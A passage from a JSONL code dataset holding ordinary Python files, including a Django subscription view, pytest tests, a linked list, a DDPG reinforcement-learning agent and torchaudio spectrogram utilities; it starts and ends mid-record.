available for %s' % ticker)\n continue\n price = float(a)\n cls = get_class(price)\n output_lines.append('%s%s%f%s%s'\n % (ticker, DELIMITER, price, DELIMITER, cls))\n update_map(cls_map, cls)\n\n print(cls_map)\n\n with open(args.price_file, 'w') as fp:\n for line in output_lines:\n print(line, file=fp)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"borabora/extract_price.py","file_name":"extract_price.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"91158471","text":"from sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndef penaltyScore(cm):\n return 50*cm[0][1] + 10*cm[1][0]\n\n\ndf = pd.read_csv(\n 'https://github.com/wintonw/ISE364/raw/master/Midterm/project_data.csv')\ndf_obs = pd.read_csv(\n 'https://github.com/wintonw/ISE364/raw/master/Midterm/new_obs.csv')\n\n# V0 to binary\nV0 = pd.get_dummies(df['V0'], drop_first=True)\ndf.drop(['V0'], axis=1, inplace=True)\ndf = pd.concat([df, V0], axis=1)\n\n\n# split the data\nX = df.drop('target', axis=1)\ny = df.target\nX_train, X_Test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=12)\n\nrfc = RandomForestClassifier(n_estimators=1400, min_samples_split=2,\n min_samples_leaf=1, max_features='auto', max_depth=90, bootstrap=False, random_state=12)\nrfc.fit(X_train, y_train)\npredictions = rfc.predict(X_Test)\ncm = confusion_matrix(y_test, predictions)\nprint(cm)\nprint(classification_report(y_test, predictions))\n\nprint(penaltyScore(cm))\n\n# Format obs data for predictions\nV0_obs = pd.get_dummies(df_obs['V0'], drop_first=True)\ndf_obs.drop(['V0'], axis=1, inplace=True)\ndf_obs = pd.concat([df_obs, V0_obs], axis=1)\ndf_obs.rename(columns={\"B\": \"V0\"}, inplace=True)\n\n# Predict\nobs_predictions = rfc.predict(df_obs)\n\n# amend df\ndf_obs = pd.concat([df_obs, pd.Series(obs_predictions, name='target')], axis=1)\n\n# save to csv\ndf_obs.to_csv('predictions.csv')\n","sub_path":"Midterm/Midterm_WintonWong_ISE364/make_prediction.py","file_name":"make_prediction.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"353900877","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\nfrom .forms import SubscribeForm\nfrom .models import Subscriber\n\nfrom scripts import emailer, constants\n\n\ndef index(request):\n return render(request, 'subscribe/subscriptionForm.html')\n\n\ndef process(request):\n if request.method == 'POST':\n form = SubscribeForm(request.POST)\n if form.is_valid():\n phone_number = form.cleaned_data['phone_number']\n if(emailer.valid_phone_number(phone_number)):\n service_provider = form.cleaned_data['service_provider']\n if service_provider in constants.PROVIDER_TO_EMAIL:\n email = phone_number + constants.PROVIDER_TO_EMAIL[service_provider]\n subscriber = Subscriber(phone_number=phone_number, service_provider=service_provider, email=email)\n subscriber.save()\n emailer.send_subscription_response(email)\n return HttpResponseRedirect(reverse('status:index'))\n return render(request, 'subscribe/subscriptionForm.html', {'attempt':'true'})\n if request.method == 'GET':\n return render(request, 
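penaltyScore in the make_prediction.py record above encodes asymmetric misclassification costs straight off sklearn's confusion matrix: for labels {0, 1}, cm[0][1] counts false positives and cm[1][0] false negatives, so false positives are punished five times harder. A toy illustration:

# Toy check of the 50*FP + 10*FN penalty used above.
from sklearn.metrics import confusion_matrix

y_true = [0, 0, 0, 1, 1, 1]
y_pred = [0, 1, 0, 1, 0, 1]
cm = confusion_matrix(y_true, y_pred)
penalty = 50 * cm[0][1] + 10 * cm[1][0]
print(cm)
print(penalty)  # 50*1 + 10*1 = 60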
'subscribe/subscriptionForm.html')","sub_path":"subscribe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"192134327","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTranslate docutils node footnote formatting.\nEach footnote start will be processed with visit() and finished with depart().\n\"\"\"\n\nfrom docutils.nodes import Node\nfrom sphinxpapyrus.docxbuilder.translator import DocxTranslator\n\nnode_name = \"footnote\"\n\n\ndef visit(visitor: DocxTranslator, node: Node):\n    \"\"\"Start processing footnote node\"\"\"\n    assert isinstance(visitor, DocxTranslator)\n    assert isinstance(node, Node)\n\n    text = node.children[0].astext().strip()\n    visitor.p = visitor._add_paragraph('[%s] ' % (text))\n    \n\ndef depart(visitor: DocxTranslator, node: Node):\n    \"\"\"Finish processing footnote node\"\"\"\n    assert isinstance(visitor, DocxTranslator)\n    assert isinstance(node, Node)\n\n    visitor.p = None\n","sub_path":"sphinxpapyrus/docxbuilder/nodes/footnote.py","file_name":"footnote.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"365688662","text":"\n# Find the sum S of all the primes p less than or equal to 101.\n# Print out that sum.\n\n# Here is a fancy helper method to detect if a positive integer n is prime.\n\ndef is_prime(n):\n    return (n > 1) and not any(n%i == 0 for i in range(2, n))\n\n# DEMO 1\n\ndef demo1():\n    # Find all the primes from 1 to 11\n    print(\"\\nHere are all the primes less than or equal to 11.\")\n    for n in range(1, 12):\n        if is_prime(n):\n            print(n, end=' ')\n\n\ndef solution():\n    # Find the sum of all the primes up to and including 101.\n    print(\"\\nHere is the sum of all the primes less than or equal to 101.\") # Labeled for the new prompt.\n    b = [] # Sets an empty array for the incoming numbers\n    for n in range(1, 102): # Iterates between 1 and 101.\n        if is_prime(n): # If the program given finds a prime number\n            b.append(n) # appends the prime numbers into the empty list\n    print(str(sum(b))) # prints the sum of all the prime numbers less than or equal to 101\n\nif __name__ == \"__main__\":\n    demo1()\n    solution() # Runs the solution\n    # solution()\n\n\n# Sample Output:\n# Here are all the primes less than or equal to 11.\n# 2 3 5 7 11\n# Finished","sub_path":"Python/Labs/Lab 1/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"439398726","text":"\n\nclass Node:\n    def __init__(self, data=None, link=None):\n        self.data = data\n        self.link = link\n\n    def get_data(self):\n        return self.data\n\n    def set_data(self, data):\n        self.data = data\n\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n\n    def insert_front(self, data):\n        _temp_node = Node(data)\n        if not self.head:\n            self.head = _temp_node\n        else:\n            temp = self.head\n            _temp_node.link = temp\n            self.head = _temp_node\n\n    def append_back(self, data):\n        _temp_node = Node(data)\n        if not self.head:\n            self.head = _temp_node\n        else:\n            temp = self.head\n            while temp.link:\n                temp = temp.link\n            temp.link = _temp_node\n\n    def display_list(self):\n        start = self.head\n\n        if not start:\n            print(\"List Empty\")\n\n        while start:\n            print(\"{} -> \".format(start.data))\n            start = start.link\n\n    def reverse_list(self):\n        print(\"Reverse List........\")\n        # an empty list has no head, so first.link below would raise AttributeError\n        if not self.head:\n            return\n        first = self.head\n        sec = first.link\n\n        first.link = 
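The is_prime helper in the primes.py record above trial-divides all the way to n - 1; an equivalent check (not from the original lab) only needs divisors up to the square root of n:

# Equivalent but faster primality test; drop-in alternative to the O(n)
# helper above, verified against the lab's expected results.
import math

def is_prime_fast(n):
    if n < 2:
        return False
    for i in range(2, math.isqrt(n) + 1):
        if n % i == 0:
            return False
    return True

assert [p for p in range(1, 12) if is_prime_fast(p)] == [2, 3, 5, 7, 11]
assert sum(p for p in range(1, 102) if is_prime_fast(p)) == 1161  # the sum solution() prints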
None\n\n while sec:\n temp = sec.link\n sec.link = first\n first = sec\n sec = temp\n\n self.head = first\n\nif __name__ == \"__main__\":\n l = LinkedList()\n l.insert_front(1)\n l.insert_front(2)\n l.append_back(3)\n l.insert_front(4)\n l.append_back(5)\n l.insert_front(6)\n l.display_list()\n l.reverse_list()\n l.display_list()\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"430970627","text":"\"\"\"Checks if IntField is usable.\n\"\"\"\n\nimport pytest\n\nfrom python_schema import field, exception\n\n\ndef test_field_loads_data():\n \"\"\"Load data to IntField, check if we can access it. Try with different\n types on input (normalisation should kick in).\n \"\"\"\n schema = field.IntField('meaning_of_everything', allow_none=True)\n\n class AnObject:\n def __str__(self):\n return '6'\n\n values_to_check = [\n ('12', 12),\n (-1, -1),\n ('0', 0),\n (42, 42),\n (0, 0),\n (AnObject(), 6),\n (None, None),\n ]\n\n for value_before, value_after in values_to_check:\n schema.loads(value_before)\n\n assert schema.name == 'meaning_of_everything'\n assert schema == value_after\n assert schema.errors == []\n assert schema.as_python() == value_after\n assert schema.as_json() == value_after\n\n\ndef test_cases_when_normalisation_fails():\n \"\"\"Test checks if normalisation is not overcommitting itself.\n \"\"\"\n schema = field.IntField('meaning_of_everything', allow_none=False)\n\n values_to_check = [\n 'True',\n True,\n False,\n 'hello',\n '12.3.4.5',\n 13.4,\n '12.8',\n ]\n\n for value in values_to_check:\n with pytest.raises(exception.NormalisationError):\n schema.loads(value)\n\n assert schema.errors == \\\n [f'IntField cannot be populated with value: {value}']\n\n try:\n schema.loads(value)\n except exception.NormalisationError as err:\n assert schema.errors == \\\n [f'IntField cannot be populated with value: {value}']\n assert str(err) == \\\n f'IntField cannot be populated with value: {value}'\n\n\ndef test_cases_when_we_do_not_allow_nones():\n schema = field.IntField('meaning_of_everything', allow_none=False)\n\n with pytest.raises(exception.NormalisationError):\n schema.loads(None)\n\n try:\n schema.loads(None)\n except exception.NormalisationError as err:\n assert schema.errors == ['None is not allowed value']\n assert str(err) == 'None is not allowed value'\n","sub_path":"tests/test_integer_field.py","file_name":"test_integer_field.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"32631471","text":"import argparse\nfrom itertools import count\n\nimport os, sys, random\nimport numpy as np\nimport _pickle as pickle \n\nimport gym\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom tensorboardX import SummaryWriter\n\nfrom utils.models import QNetwork, DeterministicPolicy\nfrom utils.ReplayBuffer import ReplayBuffer\nfrom algorithms import algorithms\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nclass DDPG(algorithms):\n\tdef __init__(self, args):\n\t\tsuper().__init__(args)\n\t\tstate_dim = self.env.observation_space.shape[0]\n\t\taction_dim = self.env.action_space.shape[0]\n\n\t\tself.actor = DeterministicPolicy(state_dim, action_dim, 64, self.env.action_space).to(device)\n\t\tself.actor_target = DeterministicPolicy(state_dim, action_dim, 64, 
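The ReplayBuffer used by the DDPG class above is imported from utils and its definition is not part of this record; what follows is a hypothetical minimal version with the same push/sample contract, for illustration only:

# Hypothetical minimal replay buffer: stores (state, next_state, action,
# reward, done) tuples and samples them column-wise, as the update() code expects.
import random
import numpy as np

class MinimalReplayBuffer:
    def __init__(self, capacity):
        self.capacity = capacity
        self.storage = []

    def push(self, transition):
        if len(self.storage) >= self.capacity:
            self.storage.pop(0)  # drop the oldest transition first
        self.storage.append(transition)

    def sample(self, batch_size):
        batch = random.sample(self.storage, batch_size)
        x, y, u, r, d = map(np.array, zip(*batch))
        return x, y, u, r, d

buf = MinimalReplayBuffer(capacity=100)
for _ in range(10):
    buf.push((np.zeros(3), np.ones(3), np.array([0.1]), 1.0, 0.0))
print(buf.sample(4)[0].shape)  # (4, 3)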
self.env.action_space).to(device)\n\t\tself.actor_target.load_state_dict(self.actor.state_dict())\n\t\tself.actor_optimizer = optim.Adam(self.actor.parameters(), self.args.lr)\n\n\t\tself.critic = QNetwork(state_dim, action_dim, 64).to(device)\n\t\tself.critic_target = QNetwork(state_dim, action_dim, 64).to(device)\n\t\tself.critic_target.load_state_dict(self.critic.state_dict())\n\t\tself.critic_optimizer = optim.Adam(self.critic.parameters(), self.args.lr)\n\n\t\tself.replay_buffer = ReplayBuffer(self.args.capacity)\n\t\tself.num_critic_update_iteration = 0\n\t\tself.num_actor_update_iteration = 0\n\t\tself.num_training = 0\n\t\tself.global_steps = 0\n\n\t\tif self.args.last_episode > 0:\n\t\t\tself.load(self.args.last_episode)\n\n\tdef update(self):\n\t\tfor it in range(self.args.update_iteration):\n\t\t\t# sample from replay buffer\n\t\t\tx, y, u, r, d = self.replay_buffer.sample(self.args.batch_size)\n\t\t\tstate = torch.FloatTensor(x).to(device)\n\t\t\taction = torch.FloatTensor(u).to(device)\n\t\t\tnext_state = torch.FloatTensor(y).to(device)\n\t\t\tdone = torch.FloatTensor(d).to(device)\n\t\t\treward = torch.FloatTensor(r).to(device)\n\n\t\t\t# computer the target Q value\n\t\t\tnext_action, _, _ = self.actor_target.sample(next_state)\n\t\t\ttarget_Q = self.critic_target(next_state, next_action)\n\t\t\ttarget_Q = reward + ((1-done) * self.args.gamma * target_Q).detach()\n\n\t\t\t# get current Q estimate\n\t\t\tcurrent_Q = self.critic(state, action)\n\n\t\t\t# compute cirtic loss and update\n\t\t\tcritic_loss = F.mse_loss(current_Q, target_Q)\n\t\t\tself.critic_optimizer.zero_grad()\n\t\t\tcritic_loss.backward()\n\t\t\tself.critic_optimizer.step()\n\n\t\t\t# computer actor loss\n\t\t\tactor_action, _, _ = self.actor.sample(state)\n\t\t\tactor_loss = -self.critic(state, actor_action).mean()\n\t\t\tself.actor_optimizer.zero_grad()\n\t\t\tactor_loss.backward()\n\t\t\tself.actor_optimizer.step()\n\n\t\t\t# update target model \n\t\t\tfor param, target_param in zip(self.critic.parameters(), self.critic_target.parameters()):\n\t\t\t\ttarget_param.data.copy_(self.args.tau * param.data + (1 - self.args.tau) * target_param.data)\n\n\t\t\tfor param, target_param in zip(self.actor.parameters(), self.actor_target.parameters()):\n\t\t\t\ttarget_param.data.copy_(self.args.tau * param.data + (1 - self.args.tau) * target_param.data)\n\n\t\t\tself.num_actor_update_iteration += 1\n\t\t\tself.num_critic_update_iteration += 1\n\n\tdef train(self):\n\t\tfor i in range(self.args.max_episode):\n\t\t\tstate = self.env.reset()\n\t\t\tep_r = 0\n\t\t\tfor t in count():\n\t\t\t\taction, _, _ = self.actor.sample(torch.FloatTensor([state]).to(device))\n\t\t\t\taction = action.cpu().detach().numpy()[0]\n\n\t\t\t\tnext_state, reward, done, info = self.env.step(action)\n\t\t\t\tself.global_steps += 1\n\t\t\t\tep_r += reward\n\t\t\t\tself.replay_buffer.push((state, next_state, action, reward, np.float(done)))\n\t\t\t\tstate = next_state\n\n\t\t\t\tif done or t > self.args.max_length_trajectory:\n\t\t\t\t\tif i % self.args.print_log == 0:\n\t\t\t\t\t\tprint(\"Ep_i \\t {}, the ep_r is \\t{:0.2f}, the step is \\t{}, global_steps is {}\".format(i, ep_r, t, self.global_steps))\n\t\t\t\t\t\tself.evaluate(10, False)\n\t\t\t\t\tbreak\n\n\t\t\tif len(self.replay_buffer.storage) >= self.args.capacity - 1:\n\t\t\t\tself.update()\n\t\tself.save(i+1)\n\n\tdef evaluate(self, number = 1, render = True):\n\t\trewards = []\n\t\tfor _ in range(number):\n\t\t\ttotal_rews = 0\n\t\t\ttime_step = 0\n\t\t\tdone = False\n\t\t\tstate = 
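The target networks in update() above are refreshed with a soft (Polyak) update, target <- tau * online + (1 - tau) * target. The same step, isolated into a standalone helper:

# Standalone sketch of the parameter-wise soft target update used above.
import torch
import torch.nn as nn

def soft_update(online: nn.Module, target: nn.Module, tau: float):
    for p, tp in zip(online.parameters(), target.parameters()):
        tp.data.copy_(tau * p.data + (1.0 - tau) * tp.data)

online = nn.Linear(4, 2)
target = nn.Linear(4, 2)
soft_update(online, target, tau=0.005)
# After many calls the target parameters track the online ones with a lag.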
self.env.reset()\n\t\t\twhile not done:\n\t\t\t\twith torch.no_grad():\n\t\t\t\t\t# use the mean action\n\t\t\t\t\t_, _, action = self.actor.sample(torch.FloatTensor([state]).to(device))\n\t\t\t\t\taction = action.cpu().detach().numpy()[0]\n\t\t\t\tif render:\n\t\t\t\t\tself.env.render()\n\t\t\t\tstate, reward, done, _ = self.env.step(action)\n\t\t\t\ttotal_rews += reward\n\t\t\t\ttime_step += 1\n\n\t\t\tif render:\n\t\t\t\tprint(\"total reward of this episode is \" + str(total_rews))\n\t\t\trewards.append(total_rews)\n\t\trewards = np.array(rewards)\n\t\tif not render:\n\t\t\tpickle.dump((self.global_steps, rewards), self.log_file)\n\t\tprint(\"mean reward {}, max reward {}\".format(rewards.mean(), rewards.max()))\n\n\tdef load(self, episode = None):\n\t\tfile_name = self.weights_file(episode)\n\t\tcheckpoint = torch.load(file_name)\n\t\tself.actor.load_state_dict(checkpoint['actor'])\n\t\tself.actor_target.load_state_dict(checkpoint['actor_target'])\n\t\tself.critic.load_state_dict(checkpoint['critic'])\n\t\tself.critic_target.load_state_dict(checkpoint['critic_target'])\n\t\tprint(\"successfully loaded model from \" + file_name)\n\n\tdef save(self, episode = None):\n\t\tfile_name = self.weights_file(episode)\n\t\ttorch.save({'actor' : self.actor.state_dict(),\n\t\t\t\t\t'critic' : self.critic.state_dict(),\n\t\t\t\t\t'actor_target' : self.actor_target.state_dict(),\n\t\t\t\t\t'critic_target' : self.critic_target.state_dict()}, file_name)\n\t\tprint(\"save model to \" + file_name)\n","sub_path":"DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"353521050","text":"\"\"\"\nThis module contains transformations to work with audio in its different representations like\naudio waveform, linear spectrogram, mel spectrogram.\n\"\"\"\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nfrom torch import Tensor, device\nimport torchaudio\nfrom torchaudio import functional as F\n\nfrom src.utils.hparams import HParams\n\n\n# TODO: compare using torchaudio.transforms vs torchaudio.functional (F)\n\n\ndef resample(waveforms: Tensor, orig_freq: int, new_freq: int) -> Tensor:\n    r\"\"\"Wrapper around torchaudio.transforms.Resample().\n\n    Args:\n        waveforms (Tensor): audio waveform. Shape: [B, 1, L] where L is the number of times the waveform\n            has been sampled and B is batch size.\n        orig_freq (int)\n        new_freq (int)\n\n    Returns:\n        waveform (Tensor): audio waveform: Shape: [B, 1, L'] where L' is the number of times the\n            waveform has been sampled (after resampling) and B is batch size.\n    \"\"\"\n    assert len(waveforms.size()) == 3, \\\n        \"Dimensions of waveforms should be 3: [B, 1, L], but found {}\".format(len(waveforms.size()))\n\n    r = torchaudio.transforms.Resample(orig_freq, new_freq)\n    return r(waveforms)\n\n\ndef wave_to_spectrogram(waveforms: Tensor, hp: HParams) -> Tensor:\n    r\"\"\"Wrapper around torchaudio.transforms.Spectrogram().\n\n    Args:\n        waveforms (Tensor): audio waveform. Shape: [B, 1, L] where L is the number of times the waveform\n            has been sampled and B is batch size.\n        hp (HParams): parameters. Parameters needed are n_fft, win_length, hop_length and power.\n\n    Returns:\n        spectrogram (Tensor): spectrogram corresponding to waveform. 
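The save()/load() pair in the DDPG record above bundles all four state dicts into a single checkpoint file (with load() restoring each into its matching network). A minimal round trip of that pattern with stand-in modules:

# Bundle several state_dicts in one dict, torch.save it, and restore each
# module from its own key.
import torch
import torch.nn as nn

actor, critic = nn.Linear(3, 1), nn.Linear(4, 1)
torch.save({"actor": actor.state_dict(), "critic": critic.state_dict()}, "ckpt.pt")

checkpoint = torch.load("ckpt.pt")
actor2, critic2 = nn.Linear(3, 1), nn.Linear(4, 1)
actor2.load_state_dict(checkpoint["actor"])
critic2.load_state_dict(checkpoint["critic"])
assert torch.equal(actor.weight, actor2.weight)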
Shape: [B, FREQ, FRAMES]\n            where B is batch size and FREQ and FRAMES depend on the parameters hp.\n            (See: https://pytorch.org/audio/transforms.html#spectrogram)\n    \"\"\"\n    assert len(waveforms.size()) == 3, \\\n        \"Dimensions of waveforms should be 3: [B, 1, L], but found {}\".format(len(waveforms.size()))\n\n    stype = 2 if hp.audio.spectrogram_type == 'power' else 1\n    spectrogram = torchaudio.transforms.Spectrogram(n_fft=hp.audio.n_fft,\n                                                    win_length=hp.audio.win_length,\n                                                    hop_length=hp.audio.hop_length,\n                                                    power=stype).to(hp.device)\n    return spectrogram(waveforms).squeeze(dim=1)\n\n\ndef spectrogram_to_wave(spectrogram: Tensor, hp: HParams, n_iter: int = 32) -> Tensor:\n    r\"\"\"Wrapper around torchaudio.transforms.GriffinLim().\n\n    Args:\n        spectrogram (Tensor): spectrogram. Shape: [B, FREQ, FRAMES] where B is batch size.\n        hp (HParams): parameters. Parameters needed are n_fft, win_length, hop_length and power.\n        n_iter (int): number of iterations for the phase recovery process.\n\n    Returns:\n        waveform (Tensor): audio waveform. Shape: [B, 1, L] where L is the number of times the waveform\n            has been sampled and B is batch size.\n    \"\"\"\n    assert len(spectrogram.size()) == 3, \\\n        \"Dimensions of spectrogram should be 3: [B, FREQ, FRAMES], but found {}\".format(\n            len(spectrogram.size()))\n\n    stype = 2 if hp.audio.spectrogram_type == 'power' else 1\n    griffinlim = torchaudio.transforms.GriffinLim(n_fft=hp.audio.n_fft,\n                                                  n_iter=n_iter,\n                                                  win_length=hp.audio.win_length,\n                                                  hop_length=hp.audio.hop_length,\n                                                  power=stype).to(hp.device)\n    return griffinlim(spectrogram).unsqueeze(dim=1)\n\n\ndef spectrogram_to_melspectrogram(spectrogram: Tensor, hp: HParams) -> Tensor:\n    r\"\"\"Wrapper around torchaudio.transforms.MelScale()\n\n    Args:\n        spectrogram (Tensor): spectrogram. Shape: [B, FREQ, FRAMES] where B is batch size.\n        hp (HParams): parameters. Parameters needed are mel_channels and sample_rate.\n\n    Returns:\n        melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES] where B is batch size\n            and N_MELS is the number of mel_channels.\n    \"\"\"\n    assert len(spectrogram.size()) == 3, \\\n        \"Dimensions of spectrogram should be 3: [B, FREQ, FRAMES], but found {}\".format(\n            len(spectrogram.size()))\n\n    melscale = torchaudio.transforms.MelScale(n_mels=hp.audio.mel_channels,\n                                              sample_rate=hp.audio.sample_rate).to(hp.device)\n    return melscale(spectrogram)\n\n\ndef melspectrogram_to_spectrogram(melspectrogram: Tensor, hp: HParams, n_iter: int = 1000) -> Tensor:\n    r\"\"\"Wrapper around torchaudio.transforms.InverseMelScale().\n\n    Args:\n        melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES] where B is batch size\n            and N_MELS is the number of mel_channels.\n        hp (HParams): parameters. Parameters needed are n_fft, mel_channels and sample_rate.\n        n_iter (int): number of optimization iterations.\n\n    Returns:\n        spectrogram (Tensor): linear spectrogram. 
Shape: [B, FREQ, FRAMES] where B is batch size.\n \"\"\"\n assert len(melspectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, N_MELS, FRAMES], but found {}\".format(\n len(melspectrogram.size()))\n\n # n_stft = nº bins in spectrogram depending on n_fft, exactly n_fft // 2 + 1\n inversemelscale = torchaudio.transforms.InverseMelScale(n_stft=hp.audio.n_fft // 2 + 1,\n n_mels=hp.audio.mel_channels,\n sample_rate=hp.audio.sample_rate,\n max_iter=n_iter).to(hp.device)\n return inversemelscale(melspectrogram)\n\n\ndef wave_to_melspectrogram(waveform: Tensor, hp: HParams) -> Tensor:\n r\"\"\"Wrapper around torchaudio.transforms.MelSpectrogram().\n\n Args:\n waveform (Tensor): audio waveform. Shape: [B, 1, L] where B is batch size\n hp (HParams): parameters. Parameters needed are sample_rate, n_fft, win_length, hop_length\n and mel_channels.\n\n Returns:\n melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES] where B is batch size.\n \"\"\"\n assert len(waveform.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, 1, L], but found {}\".format(\n len(waveform.size()))\n\n melsprectrogram = torchaudio.transforms.MelSpectrogram(sample_rate=hp.audio.sample_rate,\n n_fft=hp.audio.n_fft,\n win_length=hp.audio.win_length,\n hop_length=hp.audio.hop_length,\n n_mels=hp.audio.mel_channels).to(hp.device)\n return melsprectrogram(waveform).squeeze(dim=1)\n\n\ndef melspectrogram_to_wave(melspectrogram: Tensor, hp: HParams, n_iter: int = 32) -> Tensor:\n r\"\"\"\n Composition of transforms.melspectrogram_to_spectrogram() and transforms.spectrogram_to_wave().\n\n Args:\n melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES] where B is batch size.\n hp (HParams): parameters.\n n_iter (int): number of iteration for phase recovery process.\n\n Returns:\n waveform (Tensor): audio waveform. Shape: [B, 1, L] where B is batch size.\n \"\"\"\n assert len(melspectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, N_MELS, FRAMES], but found {}\".format(\n len(melspectrogram.size()))\n\n spectrogram = melspectrogram_to_spectrogram(melspectrogram, hp)\n waveform = spectrogram_to_wave(spectrogram, hp, n_iter)\n return waveform\n\n\ndef amplitude_to_db(spectrogram: Tensor, hp: HParams) -> Tensor:\n r\"\"\"Wrapper around torchaudio.transforms.AmplitudeToDB().\n\n Args:\n spectrogram (Tensor): spectrogram in the power/amplitude scale.\n Shape: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES] if it is a melspectrogram.\n hp (HParams): parameters. Parameters needed are power.\n\n Returns:\n spectrogram (Tensor): spectrogram in decibel scale.\n Shape: Shape: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES] if it is a melspectrogram.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES], \" \\\n \"but found {}\".format(len(spectrogram.size()))\n\n stype = 'power' if hp.audio.spectrogram_type == 'power' else 'magnitude'\n amplitudetodb = torchaudio.transforms.AmplitudeToDB(stype=stype).to(hp.device)\n return amplitudetodb(spectrogram)\n\n\ndef db_to_amplitude(spectrogram: Tensor, hp: HParams) -> Tensor:\n r\"\"\"Wrapper around torchaudio.functional.DB_to_amplitude().\n\n Args:\n spectrogram (Tensor): spectrogram in the decibel scale.\n Shape: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES] if it is a melspectrogram.\n hp (HParams): parameters. 
Parameters needed are power.\n\n Returns:\n spectrogram (Tensor): spectrogram in power/amplitude scale.\n Shape: Shape: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES] if it is a melspectrogram.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectrogram should be 3: [B, FREQ, FRAMES] or [B, N_MELS, FRAMES], \" \\\n \"but found {}\".format(len(spectrogram.size()))\n\n # power_exp calculated according to torchaudio.functional.DB_to_amplitude docs\n power_exp = 1 if hp.audio.spectrogram_type == 'power' else 0.5\n return F.DB_to_amplitude(spectrogram, ref=1, power=power_exp)\n\n\ndef plot_wave(waveforms: Tensor, hp: HParams) -> None:\n r\"\"\"Plots the amplitude waveforms.\n\n Args:\n waveforms (Tensor): list of audio waveforms. Shape: [B, 1, L] where L is the number\n of times the waveform has been sampled and B is batch size.\n hp (HParams): parameters. Parameters needed are sample_rate.\n \"\"\"\n assert len(waveforms.size()) == 3, \\\n \"Dimensions of waveforms should be 3, found {}\".format(len(waveforms.size()))\n\n for idx, waveform in enumerate(waveforms):\n print(\"Waveform {}, shape: {}\".format(idx, waveform.size()))\n print(\"Waveform {}, Sample rate: {}\".format(idx, hp.audio.sample_rate))\n\n n_waveforms = waveforms.shape[0]\n # In case the waveforms tensor is in the GPU\n waveforms = waveforms.detach().to('cpu')\n fig = plt.figure()\n for i in range(0, n_waveforms):\n fig.add_subplot(n_waveforms, 1, i + 1)\n plt.plot(waveforms[i].flatten(), alpha=0.8)\n plt.xlabel(\"Time (samples)\")\n plt.ylabel(\"Amplitude\")\n plt.show()\n\n\ndef plot_spectrogram(spectrogram: Tensor, hp: HParams) -> None:\n r\"\"\"Plots spectrogram without information in x-axis and y-axis.\n\n Args:\n spectrogram (Tensor): spectrogram. Shape: [B, FREQ, FRAMES].\n hp (HParams): parameters.\n\n .. Note:\n This function plots the spectrogram without axis values.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectogram should be 3, found {}\".format(len(spectrogram.size()))\n\n n_spectrograms = spectrogram.shape[0]\n # In case the spectrogram tensor is in the GPU\n spectrogram = spectrogram.detach().to('cpu')\n fig = plt.figure()\n for i in range(0, n_spectrograms):\n fig.add_subplot(n_spectrograms, 1, i + 1)\n plt.imshow(spectrogram[i].detach().to('cpu'), origin='lower', interpolation=\"none\")\n plt.axis('off')\n plt.show()\n\n\ndef plot_melspectrogram(melspectrogram: Tensor, hp: HParams) -> None:\n r\"\"\"Plots melspectrogram without information in x-axis and y-axis.\n\n Args:\n melspectrogram (Tensor): melspectrogram. Shape: [B, N_MELS, FRAMES].\n hp (HParams): parameters.\n\n .. Note:\n This function plots the melspectrogram without axis values.\n \"\"\"\n assert len(melspectrogram.size()) == 3, \\\n \"Dimensions of melspectogram should be 3, found {}\".format(len(melspectrogram.size()))\n\n n_melspectrograms = melspectrogram.shape[0]\n # In case the spectrogram tensor is in the GPU\n melspectrogram = melspectrogram.detach().to('cpu')\n fig = plt.figure()\n for i in range(0, n_melspectrograms):\n fig.add_subplot(n_melspectrograms, 1, i + 1)\n plt.imshow(melspectrogram[i], origin='lower', interpolation=\"none\")\n plt.axis('off')\n plt.show()\n\n\ndef save_spectrogram(filepath: str, spectrogram: Tensor, hp: HParams) -> None:\n r\"\"\"Saves spectrogram as an image.\n\n Args:\n filepath (str): path where the spectrogram will be saved.\n spectrogram (Tensor): spectrogram. 
